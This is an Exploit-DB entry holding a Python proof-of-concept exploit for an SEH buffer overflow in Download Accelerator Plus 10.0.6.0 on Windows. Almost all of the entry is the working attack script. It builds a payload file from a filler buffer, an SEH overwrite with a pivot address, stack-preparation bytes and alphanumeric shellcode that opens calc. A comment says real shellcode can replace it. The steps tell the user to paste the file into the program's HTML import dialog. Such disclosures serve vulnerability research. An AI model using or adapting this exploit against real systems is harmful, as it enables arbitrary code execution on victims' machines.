Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow

EDB-ID:

46673

CVE:

N/A




Platform:

Windows

Date:

2019-04-08


#!/usr/bin/python                                                                                         #
# Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow                             #
# Date: 2019-04-05                                                                                        #
# Vendor Homepage: http://www.speedbit.com/dap/                                                           #
# Software Link: http://www.speedbit.com/dap/download/downloading.asp                                     #
# Exploit Author: Peyman Forouzan                                                                         #
# Tested Version: 10.0.6.0                                                                                #
# Tested on: Win10 Enterprise 64 bit                                                                      #
# Note : In other versions of Windows, it will cause the program to Crash                                 #
# Special Thanks to my wife                                                                               #
# Steps :                                                                                                 #
#  1- Run python code : Dap.py ( Dap.txt is created )                                                     #
#  2- Open the APP --> File --> Import --> Html Web Page --> paste in contents from the Dap.txt into      #
#     Import Web Page --> Ok --> Shellcode (Calc) open                                                    #
#---------------------------------------------------------------------------------------------------------#

junk = "\x41" * 4091

nseh = "\x61\x62"
seh  = "\x57\x42"			# Overwrite Seh # 0x00420057 : {pivot 8}

prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107;

# calc unicode shell - can be replaced with shellcode
calc =  "PPYAIAIAIAIAQATAXAZAPA3QADAZA"
calc += "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
calc += "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
calc += "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
calc += "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
calc += "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
calc += "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
calc += "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
calc += "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
calc += "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
calc += "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
calc += "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
calc += "QQ2LRCM0LJA";

buffer = "http://" + junk + nseh + seh + prepare + calc
print "[+] Creating %s bytes payload ..." %len(buffer)
f = open ("Dap.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()